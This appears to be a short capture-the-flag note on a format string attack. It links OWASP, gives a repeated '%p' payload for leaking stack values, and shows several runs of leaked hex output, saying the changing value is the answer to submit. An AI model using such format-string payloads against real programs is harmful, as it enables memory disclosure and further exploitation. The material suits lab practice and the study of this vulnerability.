https://www.owasp.org/index.php/Format_string_attack

Send the %p format string a few times. Observe which hex changes. That will be the hex address to submit!

0x40
0xf7fc7c20
0x8048792
0x1

%p%p%p%p%p%p%p
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p


0x40
0xf7fc7c20
0x8048792
0x1
0xffffdd34
0xbf79afa40x30xf7fc73c40xffffdca0(nil)0xf7e37a630x8048740(nil)(nil)0xf7e37a630x10xffffdd340xffffdd3c0xf7feac3a0x10xffffdd340xffffdcd40x8049adc0x80482a80xf7fc7000(nil)(nil)(nil)0x222d96610x1b609271(nil)


0x40
0xf7fc7c20
0x8048792
0x1
0xffffdd34
0x9f5820e8
0x30xf7fc73c40xffffdca0(nil)0xf7e37a630x8048740(nil)(nil)0xf7e37a630x10xffffdd340xffffdd3c0xf7feac3a0x10xffffdd340xffffdcd40x8049adc0x80482a80xf7fc7000(nil)(nil)(nil)0xb4d8d11d0x8d95d50d(nil)


0x40
0xf7fc7c20
0x8048792
0x1
0xffffdd34
0x2bf5a1d
0x3
